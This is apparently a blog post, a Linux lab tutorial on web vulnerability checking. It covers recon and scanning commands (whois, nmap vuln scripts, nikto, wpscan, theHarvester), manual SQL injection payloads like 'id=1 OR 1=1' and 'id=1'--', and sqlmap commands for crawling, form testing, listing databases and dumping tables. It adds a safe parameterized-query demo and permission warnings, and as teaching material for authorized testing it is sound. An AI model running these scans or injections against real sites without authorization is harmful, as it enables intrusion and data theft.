Tuesday, 18 March 2025

Cybersecurity - Website Vulnerability check - Working on Linux - Lab

🔍 Phase 1: Basic Reconnaissance & Scanning (Legal & Passive Tools)

Here are some initial commands and techniques you can safely use to gather information.

1. Whois Lookup

whois <target-domain>   (e.g., whois abc.co.in)

This reveals domain ownership details and can help find registrant info, DNS, emails, etc.
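Raw whois output is just "Key: Value" text, so a small script can pull the interesting fields out of it. A minimal sketch follows; the field names vary by registry, and the sample output below is made up for illustration.

```python
# Best-effort parse of whois-style "Key: Value" output.
# Field names differ between registries, so treat results as hints.
import re

def parse_whois(text, fields=("Registrar", "Name Server", "Registrant Organization")):
    """Collect values for the given field names from whois-style output."""
    found = {}
    for line in text.splitlines():
        m = re.match(r"\s*([^:]+):\s*(.+)", line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key in fields:
            found.setdefault(key, []).append(value)
    return found

# Illustrative sample, not real registry data
sample = """\
Registrar: Example Registrar Pvt. Ltd.
Name Server: ns1.example-dns.net
Name Server: ns2.example-dns.net
Registrant Organization: Example Institute
"""
print(parse_whois(sample))
```

In practice you would feed it the output of `whois <target-domain>` captured via `subprocess`.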

2. DNS Information

dig <target-domain> ANY

or

nslookup -type=any <target-domain>

This provides DNS records (A, MX, TXT, etc.), which can reveal mail servers and misconfigurations. Note that many DNS servers now refuse ANY queries (RFC 8482), so if you get an empty or minimal answer, query record types individually (e.g., dig <target-domain> MX).
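For a quick scriptable lookup, Python's standard library can resolve A records without any extra tooling. This is only a minimal sketch (it can't fetch MX, TXT, etc.; use dig or dnsrecon for those); it resolves localhost here so it works without touching any target.

```python
# Minimal A-record lookup using only the standard library.
import socket

def a_records(hostname):
    """Return the sorted set of IPv4 addresses a hostname resolves to."""
    infos = socket.getaddrinfo(hostname, None, family=socket.AF_INET)
    return sorted({info[4][0] for info in infos})

# localhost resolves via /etc/hosts, so no network is needed
print(a_records("localhost"))
```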

3. SSL/TLS Certificate Check

sslscan <target-domain>

or use an online tool like SSL Labs
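One certificate property worth checking programmatically is expiry. Python's `ssl` module can parse the `notAfter` timestamp format that `ssl.getpeercert()` returns; the sketch below uses made-up dates rather than contacting a live server.

```python
# Days remaining on a certificate, given its notAfter string in the
# format ssl.getpeercert() returns (e.g. 'Jun  1 12:00:00 2030 GMT').
import ssl
import time

def days_until_expiry(not_after):
    """Negative result means the certificate has already expired."""
    expires = ssl.cert_time_to_seconds(not_after)
    return (expires - time.time()) / 86400

# Illustrative dates, not from a real certificate
print(f"{days_until_expiry('Jun  1 12:00:00 2030 GMT'):.0f} days left")
print(f"{days_until_expiry('Jan  1 00:00:00 2020 GMT'):.0f} days left")
```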

4. Subdomain Enumeration

sublist3r -d <target-domain>

or

assetfinder --subs-only <target-domain>

Finds subdomains of the target, which can expose staging servers, admin panels, and other forgotten hosts.
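At their simplest, these tools build candidate names and check whether they resolve. A toy sketch of that idea, with a tiny illustrative wordlist (real tools use large lists plus certificate-transparency and search-engine sources):

```python
# Toy subdomain brute-force sketch: build candidates from a wordlist,
# then resolve each one. The wordlist is a tiny illustrative sample.
import socket

WORDLIST = ["www", "mail", "admin", "staging", "dev", "vpn"]

def candidates(domain, words=WORDLIST):
    """Candidate hostnames to try for a given domain."""
    return [f"{w}.{domain}" for w in words]

def resolves(hostname):
    """True if DNS resolves the name (needs network for real targets)."""
    try:
        socket.gethostbyname(hostname)
        return True
    except socket.gaierror:
        return False

for host in candidates("example.com"):
    print(host)  # call resolves(host) only against targets you may test
```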

5. WhatWeb / Wappalyzer

whatweb https://<target-domain>

Detects technologies used: web server, CMS, frameworks, etc.

6. Nikto Scan (light and legal)

nikto -h https://<target-domain>

Scans for common vulnerabilities like outdated software, directory listings, etc.


⚠️ Phase 2: Deeper Scanning (Only With Explicit Permission)

These tools are more intrusive and should only be used with signed-off permission.

  • nmap with vulnerability scripts
  • wpscan (if WordPress)
  • gobuster or dirb for hidden directories
  • Manual testing for:
    • Open ports
    • Misconfigured headers
    • SQL injection
    • XSS
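The "misconfigured headers" check above is easy to automate once you have the response headers (e.g., from `curl -sI` or a requests call). A minimal sketch; the header list is a common baseline, not an exhaustive audit, and the sample response below is made up.

```python
# Flag missing security headers given a response-header mapping.
RECOMMENDED = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Content-Type-Options",
    "X-Frame-Options",
    "Referrer-Policy",
]

def missing_security_headers(headers):
    """Return the recommended headers absent from a response (case-insensitive)."""
    present = {k.lower() for k in headers}
    return [h for h in RECOMMENDED if h.lower() not in present]

# Illustrative response headers, not from a real scan
sample = {"Content-Type": "text/html", "X-Frame-Options": "DENY"}
print(missing_security_headers(sample))
```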

🛠️ TOOLS YOU'LL NEED (Set Up First)

Make sure these are installed in your Kali Linux / Parrot OS / Ubuntu system (or compatible OS):

Tool          Purpose                               Install Command
nmap          Port scanning and service detection   sudo apt install nmap
whatweb       Technology fingerprinting             sudo apt install whatweb
nikto         Web server vulnerability scanner      sudo apt install nikto
sublist3r     Subdomain enumeration                 sudo apt install sublist3r
dnsrecon      DNS recon and zone transfer           sudo apt install dnsrecon
theHarvester  Email/host enumeration                sudo apt install theharvester
sslscan       SSL/TLS analysis                      sudo apt install sslscan
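A quick pre-flight script can confirm the tools above are actually on your PATH before you start the lab. `shutil.which` returns None for anything not installed.

```python
# Pre-flight check: which of the lab tools are installed?
import shutil

TOOLS = ["nmap", "whatweb", "nikto", "sublist3r", "dnsrecon", "theHarvester", "sslscan"]

def check_tools(tools=TOOLS):
    """Map each tool name to True/False depending on PATH availability."""
    return {t: shutil.which(t) is not None for t in tools}

for tool, ok in check_tools().items():
    status = "OK" if ok else "MISSING -> sudo apt install " + tool.lower()
    print(f"{tool:12s} {status}")
```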


🧪 PHASE 1: RECON & INFORMATION GATHERING

1. 🔍 Get Domain Info (WHOIS)

whois <target-domain>

2. 🌐 Check DNS Records

dig <target-domain> ANY

or

dnsrecon -d <target-domain>

3. 🌍 Subdomain Enumeration

sublist3r -d <target-domain>

This may reveal staging environments, admin panels, etc.

4. 🧠 Identify Tech Stack

whatweb https://<target-domain>

Finds out if they’re using Apache, Nginx, PHP, WordPress, etc.


🔥 PHASE 2: VULNERABILITY SCANNING

5. 🚪 Scan for Open Ports & Services

sudo nmap -sS -sV -T4 -Pn <target-domain>

(The -sS SYN scan needs raw-socket access, hence sudo.)

Then try with scripts:

nmap -sV --script vuln <target-domain>

This uses known NSE scripts to find common vulnerabilities.
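For scripting follow-up steps, nmap's grepable output (-oG -) is easy to parse. A minimal sketch that extracts open TCP ports; the sample line below is illustrative (TEST-NET address), not a real scan result.

```python
# Pull open TCP ports out of a line of nmap grepable (-oG) output.
# Grepable port entries look like: 22/open/tcp//ssh//
import re

def open_ports(grepable_line):
    """Return [(port, service), ...] for ports nmap marked open."""
    return [
        (int(m.group(1)), m.group(2))
        for m in re.finditer(r"(\d+)/open/tcp//([^/]*)", grepable_line)
    ]

# Illustrative sample, not real scan output
line = "Host: 203.0.113.10 ()  Ports: 22/open/tcp//ssh//, 80/open/tcp//http//, 443/closed/tcp//https//"
print(open_ports(line))
```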

6. 🕷️ Web Vulnerability Scan

nikto -h https://<target-domain>

Looks for:

  • Outdated software
  • Misconfigurations
  • Dangerous files
  • Header issues

7. 🔐 SSL/TLS Security Check

sslscan <target-domain>

Or online via SSL Labs


🧾 PHASE 3: OPTIONAL OSINT

8. 📧 Emails & Public Data

theHarvester -d <target-domain> -b all


🧩 OPTIONAL: CMS-Specific Scan

If WhatWeb or Nmap reveals a CMS (like WordPress):

wpscan --url https://<target-domain>/ --enumerate u,vp,vt

(u = users, vp = vulnerable plugins, vt = vulnerable themes. Vulnerability data requires a free WPScan API token, passed with --api-token.)



⚠️ Before You Start: Pre-Checks

Make sure the site has:

  • URL parameters like ?id=1, ?page=contact, etc.
  • Forms (login, search, feedback, etc.)

These are the typical injection points for SQLi.


🧪 1. Manual Testing (Quick Check in Browser)

Try injecting a ' into parameters and observe behavior:

https://<target-domain>/page.php?id=1'

  • If the site returns a DB error (like "You have an error in your SQL syntax"), that’s a red flag.
  • Try variations like:

https://<target-domain>/page.php?id=1 OR 1=1

https://<target-domain>/page.php?id=1'--

https://<target-domain>/page.php?id=1 AND 1=2

(Encode spaces as %20 or + if your browser doesn't do it for you.)
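To see why these payloads work, here's a throwaway local demo using SQLite: the same attacker input returns every row when concatenated into the SQL string, and nothing when passed as a bound parameter. This runs entirely on your own machine; no target is involved.

```python
# Local demo: string-built SQL vs a parameterized query.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER, name TEXT)")
db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])

user_input = "1 OR 1=1"  # attacker-controlled value from a ?id= parameter

# Vulnerable: the input is concatenated straight into the statement, so
# "OR 1=1" becomes part of the WHERE clause and matches every row.
leaked = db.execute(f"SELECT name FROM users WHERE id = {user_input}").fetchall()
print("concatenated query returned:", leaked)

# Safe: a parameterized query treats the whole input as one literal value,
# so no row has an id equal to the string "1 OR 1=1".
safe = db.execute("SELECT name FROM users WHERE id = ?", (user_input,)).fetchall()
print("parameterized query returned:", safe)
```

This is also the fix to recommend in your report: always bind user input as parameters instead of building SQL strings.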


⚙️ 2. Use sqlmap – the Ultimate SQLi Tool

🔧 Install sqlmap

Already installed in Kali Linux, but if not:

sudo apt install sqlmap

🔍 Basic Command

sqlmap -u "https://<target-domain>/page.php?id=1" --batch --level=3 --risk=2

🔍 Form Testing (Interactive Forms)

sqlmap -u "https://<target-domain>/login.php" --forms --batch --level=3 --risk=3

🔎 Crawl & Test Entire Site

sqlmap -u "https://<target-domain>" --crawl=3 --batch --level=3 --risk=3


💡 Useful sqlmap Options

Option                              Purpose
--dbs                               List databases
--tables -D [dbname]                List tables in a DB
--columns -T [table] -D [dbname]    Get columns
--dump                              Dump data from a table
--cookie="PHPSESSID=abc123"         Use session cookies
--auth-type & --auth-cred           If HTTP login required

Example:

sqlmap -u "https://<target-domain>/news.php?id=2" --dbs


🛑 WARNING

  • Never use --dump or extract actual data without written permission.
  • Keep tests at lower --risk and --level unless specifically asked to go deeper.
  • Use --batch to skip prompts if you're scripting.
